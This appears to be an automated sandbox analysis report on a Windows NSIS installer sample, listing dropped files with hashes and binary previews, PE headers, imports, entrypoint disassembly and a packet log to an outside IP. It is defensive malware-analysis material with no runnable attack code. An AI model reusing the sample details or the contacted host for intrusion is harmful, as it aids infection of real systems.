Preview:	..jP...t.w.M...G..wP.c.2>.m.....H.,q..8.#..x ..L.j..&.oc?mp%.v..7.....1.........t.R..k...B..I..EL..q....yl..B..Trf..^[.t?.U^....q.o...%......w..)6E....!\|. .....Fb...!7..).o.[.Li.9.7.m...d.c...Hh.x....J;j..r.&q\nk..N+.X....yM0...s....\..p..e.FL./.`G..uz....X..J.P.s.2)..X...@W$...4.p....m.........0(...7..0`.....G."W....'......5..x..;E...N&..G...n.$.'.50....Q.8.N....^d.zN....,...J\|zO...F./..K..4T_..L.i..[^..p.W&0W...%.8`.q.1G..F.el.."....D1...!w.t....\..&..y.?[p....%..pH....{...n....,4.o.!.6.Kj:7..".o....%k...Nv..-....o.C..C..`..;..\|.J!..p...>.4w6.......3.rV....]).n..P..t...#}..j....X}.d..@.h....b......s..u.....X...jO'm...?.9.~G.....=#.j...D.....y...hT.P........z.aX*8.y.......t...W...E.V7....... ..[..D..xe..W8J<........M....H6.....]Z...7.1........E...=.IK..B.[....t.....S..Zs.XY.smD...q../....Q......v.@......?......T.`...V5........P&F...F..3.A...e./.o.?.:'...GC.$...An..;..H.2....LC.?j.)..A..75..D.a.F\|..P..1.s.........Q.X.^.5J..'.4.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Quarrelers.Cod

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	ASCII text, with very long lines (63174), with no line terminators
Category:	dropped
Size (bytes):	63174
Entropy (8bit):	2.6774097576064904
Encrypted:	false
SSDEEP:	768:3YEEGqhLpa+/YcynMY2/LX+OLugY5QzfsqHeWEEtKxla+2HfoiHdGhM0RSliNkWj:P+gnaLU6nHfOhJSAk9MN8ABC0riG
MD5:	4A179C732FBA82188F2D1C207BFE228E
SHA1:	D8A88AB76074671ED11A9636DBE6012A2B61C6C1
SHA-256:	2ADE6C66A5BF036D8E9899ADE349C7A887BE41757A7004869E19A64AB2BD0B7E
SHA-512:	D6200251DC566516FFD8601153022B0E8AAAFCED83CA2A95CB3F93E12E84DDFEC2FBC48CACFE49EBF34A25D5418FDEF154D31AB008BBA878B7B21E7D98FD81EF
Malicious:	false
Preview:	003000E9004E00000041000000484800D10000606000230000575700C10000006A6A00A0A0A0001717170000005C5C00A7000000F50000004C4C000028282800A70000A70070707070707000AF00DF00AFAF00EBEB00AF0000000000F00057001F008D8D002C2C2C0000000000606060606060600000800000E7000000320000003737007A7A0000606060606000007474740000000000262600BDBD008F0000F8F80051510033330000CC0000000000E3E300B00000BA0000000303009595959500B40054545454005700F600006C0000EA004A4A000D00001B1B1B1B000039000000000000737373730000AC004100000000002B0000202020202000858500CC000017005900003D0045450000006D00FE00000005050505000055555500000098000000AC00007E006200000900003D3D004F4F000000000000D6007D7D003D00000000000043430000007F007E00F600000000000000000000000041008E8E8E8E8E8E8E006F6F0035004B000000CA002C00130000000000000000AE00006000000000EB000000E700004D4D4D00AD0000330045454545450000000500A9A9008D8D0000D4000000ED00000000003D3D000000C1C1000000000B000000CACACACACACACA0047003232004E4E00000000F300000000003D00008E8E007F000E004545454500007B009C9C9C00000003030000

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\Postpyloric6.Ann

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	data
Category:	dropped
Size (bytes):	118233
Entropy (8bit):	7.710808982633477
Encrypted:	false
SSDEEP:	3072:XO5UDdjGuQqD+lhBEfDhNTWYZwhVZqBEKwib7YuX3:LDddisbaY6hVZqBLdRX3
MD5:	A7B2863D380B7FE3F8E99B4BF634B39F
SHA1:	85595D001B815501BB91996BCAE34600ABA3C36E
SHA-256:	65FE205CBE270540C6E67A3307C61EE18475062F36F8A5836B3958BD7E24F533
SHA-512:	3403955017869C8A4602441B20EDC52EC9AFC26CA6FE3891309BEF8B2A4CDD7C4D50CC2DCE667467CC72044C01F729476772FE1B83EF2F4A5CFB3940A4BF7D9B
Malicious:	false
Preview:	...............................U..].........CCC.....2.4.....<.................4.......ddddddd.......w................DDDD....ttt..........................mm......v.x..............%.......}}.u.....................8................}.K.5...................g...u.......c............b.......ff....&&.........l.....................?...............h.......!..\|......5......................................................T...4...yy.........................oo.....j..r.......V..D.....V..........................(......C..333............99..P..........******..JJ..iii.........m.$..........l..$..................................................8....ppppppp........~~~~..........QQQQ..n..M.....................[....GG.............gggggggggg..........===.6.........................C.................999......+.......222......0.y..............b.....!!..................U........[.zz..................7..................Z..........YY.......A.....\|.....M........,,..LLL.1...KK.....H......PP......O..e....J.o.L.....\|

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	5.775805248630538
Encrypted:	false
SSDEEP:	1536:QFNovLGNuZPQtwhY4SFDivO5Ib6VU3x8sDKxq:QFNsLGNulhY4SG+xq
MD5:	0EDD7743DB76D68D2E198F137E56360C
SHA1:	76B0ACA1C410901C8399FBFDAC2AC36E80C4837C
SHA-256:	F03C45B29D8DB5C2BD9461EFB834723C2F9C84A1FED921D9577BC0511AE0B86D
SHA-512:	67716007A5771D3A45104CB0C3823EBAE58F39E91B5A8AA4653A6FD3E65162C824DF7E5944A123DA70F7739904EF46E43B7A7E1906BE95FB11CAE906673FBB58
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: eua.ps1, Detection: malicious, Browse Filename: zk.ps1, Detection: malicious, Browse Filename: mx.ps1, Detection: malicious, Browse Filename: zpeu.exe, Detection: malicious, Browse Filename: zpeu.exe, Detection: malicious, Browse Filename: as.ps1, Detection: malicious, Browse Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse Filename: DB948GHBNJI.xlsx, Detection: malicious, Browse Filename: Order-new world foods.xlsx, Detection: malicious, Browse Filename: 8cAZneRN6B.exe, Detection: malicious, Browse Filename: 8cAZneRN6B.exe, Detection: malicious, Browse Filename: fr34veeTGm.exe, Detection: malicious, Browse Filename: fr34veeTGm.exe, Detection: malicious, Browse Filename: ShipmentReceipt9521368040.xlsx, Detection: malicious, Browse Filename: njUIPPVrud.exe, Detection: malicious, Browse Filename: njUIPPVrud.exe, Detection: malicious, Browse Filename: ShipmentReceipt93213628045.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.O...........!.....N..........~m... ........@.. ...............................%....@.................................$m..W....................................l............................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................`m......H........F...&...................E.......................................(......0................(....(......(....&.(...+."..(.......Z.~....(....-..s.......0..6........{.........(.....{....M........ZXM)....(.......(........0..D........{........,..o....+.~....(.....{....M........ZXM)....(.......(......0..5..........{..........(.....{....M........ZXM)....(.............0..6..........{..........{....M........ZXM)....(..........(.....*...0..:.......s.......o......(......~.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\bn.txt

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15062
Entropy (8bit):	4.039346182307332
Encrypted:	false
SSDEEP:	192:iM+g4O23sZEstg+lTr++0Mx148IiZaXTXEU10bXYc+4/rexX4:iMyc2stg+lTr++0MQ8DZRDYc+4axI
MD5:	D0E788F64268D15B4391F052B1F4B18A
SHA1:	2FD8E0A9DD22A729D578536D560354C944C7C93E
SHA-256:	216CC780E371DC318C8B15B84DE8A5EC0E28F712B3109A991C8A09CDDAA2A81A
SHA-512:	D50EA673018472C17DB44B315F4C343A2924A2EAA95C668D1160AA3830533CA37CC13C2067911A0756F1BE8C41DF45669ABE083759DCB9436F98E90CBB6AC8BF
Malicious:	false
Preview:	.;!@Lang2@!UTF-8!..; 4.46 : Team Oruddho (Fahad Mohammad Shaon, Mahmud Hassan) : http://www.oruddho.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Bangla.........401..... ..................&.......&....&.... ................&...... .......440..&....... .... ........&...... .... .............. ......&........& .......&.............. ............... ..... .... ......?..500..&......&..................&..&.......&........&........540..&........ .....7-zip-. ........ ........... ........ .....&..........&............. ...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\find-location-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	713
Entropy (8bit):	4.445408002557924
Encrypted:	false
SSDEEP:	12:TMHdPnnl/nu3tlndL9+Wlz3MQFcWUio23kRqaM8UwYOWlz2Wlzm7Wlzi5WlzsbWW:2dPnnxu3tldLklFWUi/3kRqaRUZODv7R
MD5:	9A5B1DB3C4E78A928BDB639BE46AA003
SHA1:	595D3D9C7BB646CF607923AEBC3583B48F03B426
SHA-256:	0C481D646B531DCBF2FCCE2A034CE6A202CAEEB1C17A591756CB3A08514AC9ED
SHA-512:	CA5E59B27D89651DFE89868C2D0DF63EFE64AB4B3E0E49937CFC15E84610505E2378E29D716FB803BEF74C80D99D25E93B7D5E8D7B1BE3EF905A8C910011F47F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 11 8 c 0 1.65625 -1.34375 3 -3 3 s -3 -1.34375 -3 -3 s 1.34375 -3 3 -3 s 3 1.34375 3 3 z m 0 0"/>. <path d="m 8 1 c -3.851562 0 -7 3.144531 -7 7 s 3.148438 7 7 7 s 7 -3.144531 7 -7 s -3.148438 -7 -7 -7 z m 0 2 c 2.773438 0 5 2.230469 5 5 s -2.226562 4.996094 -5 4.996094 s -5 -2.226563 -5 -4.996094 s 2.226562 -5 5 -5 z m 0 0"/>. <path d="m 7 0 h 2 v 3 h -2 z m 0 0"/>. <path d="m 7 13 h 2 v 3 h -2 z m 0 0"/>. <path d="m 16 7 v 2 h -3 v -2 z m 0 0"/>. <path d="m 3 7 v 2 h -3 v -2 z m 0 0"/>. </g>.</svg>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\network-cellular-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	441
Entropy (8bit):	4.575285851859924
Encrypted:	false
SSDEEP:	12:t4CDqwqZo8nGGa6Smf+e9s/J7e3VN5IUavl+i:t4CGosm6Sle9s/Be3Vv+lN
MD5:	79F668FBC971471D3CE930DD5B53F01D
SHA1:	0A21641F8BDCA5C3DDAAA2224E80784BF1F3EE9A
SHA-256:	8ECA65E299CCB64B2145263827EED45130336E01A4FB1F309C8A36E8751473D4
SHA-512:	DFA0CD2923F83514181299F7374D553B2B427028E47BC2033E377850FD98121806EA370DEE64349AE410F84CC815E74AFF8E11227FCF21E2E1BF83BAA6BD2616
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1c-1.261.98-2 2.833-2 5 0 2.127.777 4.005 2 5h1V9c-.607-.78-1-1.759-1-3s.393-2.211 1-3V1zm11 0v2c.607.789 1 1.759 1 3s-.393 2.22-1 3v2h1c1.223-.995 2-2.873 2-5 0-2.167-.739-4.02-2-5zM4 3c-.688.784-1 1.743-1 3s.328 2.163 1 3h1V3zm7 0v6h1c.672-.837 1-1.743 1-3s-.312-2.216-1-3zM8 4a2 2 0 100 4 2 2 0 000-4zm0 5a1 1 0 00-1 1v6h2v-6a1 1 0 00-1-1z" fill="#2e3436"/></svg>

C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\64Tgzu2FKh.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.7218967633534605
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	64Tgzu2FKh.exe
File size:	344681
MD5:	9dca43cb15d97693d2de73683804c5c7
SHA1:	3bf61bc542db16e0a045505c2868cd12cfcac769
SHA256:	c3ac750a23fb48eee9e1ce2d9bd59aadbc190a1dd36afbdc9f5c39eeb7f87756
SHA512:	26a0870ae04d5939c410f31b1755d0ae37658921536d6c6a02fa59003b5cf3ad1fc5d4da919dd1b6d58b451210bd46084e74fd44c8988065fee78b88eb122549
SSDEEP:	6144:bmOPbtybqh+/fDv9vE520B36t/21/F99OjpiN6:ft2W+nz9s520j999OS6
TLSH:	0C74F1043FC6CE92E3990C3016756310A23ABFE119A74747FB58776E3531AE6AE0E355
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*.....

File Icon


Icon Hash:	232b656d68727ef8

Static PE Info

General

Entrypoint:	0x40333d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759527 [Mon Jul 24 06:35:19 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A20Ch], eax
je 00007F819450A293h
push ebx
call 00007F819450D529h
cmp eax, ebx
je 00007F819450A289h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F819450D4A3h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F819450A26Ch
push 0000000Ah
call 00007F819450D4FCh
push 00000008h
call 00007F819450D4F5h
push 00000006h
mov dword ptr [0042A204h], eax
call 00007F819450D4E9h
cmp eax, ebx
je 00007F819450A291h
push 0000001Eh
call eax
test eax, eax
je 00007F819450A289h
or byte ptr [0042A20Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A2D8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216A8h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0x28418	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x626d	0x6400	False	0.6569921875	data	6.423132440637118	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20318	0x600	False	0.4921875	data	3.906531854842304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x25000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x50000	0x28418	0x28600	False	0.42096797600619196	data	4.905032913015184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x50358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States
RT_ICON	0x60b80	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States
RT_ICON	0x6a028	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States
RT_ICON	0x6f4b0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States
RT_ICON	0x736d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States
RT_ICON	0x75c80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States
RT_ICON	0x76d28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States
RT_ICON	0x776b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States
RT_DIALOG	0x77b18	0x100	data	English	United States
RT_DIALOG	0x77c18	0x11c	data	English	United States
RT_DIALOG	0x77d38	0xc4	data	English	United States
RT_DIALOG	0x77e00	0x60	data	English	United States
RT_GROUP_ICON	0x77e60	0x76	data	English	United States
RT_VERSION	0x77ed8	0x1f0	MS Windows COFF PowerPC object file	English	United States
RT_MANIFEST	0x780c8	0x34e	XML 1.0 document, ASCII text, with very long lines (846), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 1, 2023 22:35:35.211927891 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.371920109 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.372219086 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.372864962 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.532428980 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.534806013 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.534929991 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.534944057 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.534955025 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.534966946 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.535008907 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.535073042 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.535082102 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.535082102 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.535090923 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.535103083 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.535114050 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.535125971 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.535181999 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.535303116 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.535303116 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695092916 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695213079 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695281029 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695334911 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695390940 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695409060 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695446968 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695467949 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695502996 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695560932 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695590019 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695590019 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695590019 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695616961 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695672989 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695728064 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695768118 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695782900 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695817947 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695838928 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695894003 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.695903063 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695903063 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695945024 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.695949078 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.696002960 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.696058035 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.696058035 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.696090937 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.696099997 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.696158886 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.696185112 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.696213007 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.696244955 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.696269035 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.696295977 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.696409941 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.696409941 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.856300116 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856408119 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856553078 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856587887 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.856615067 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856647968 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.856674910 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856770992 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856784105 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.856834888 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.856862068 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856950045 CEST	49848	80	192.168.11.20	203.175.174.69
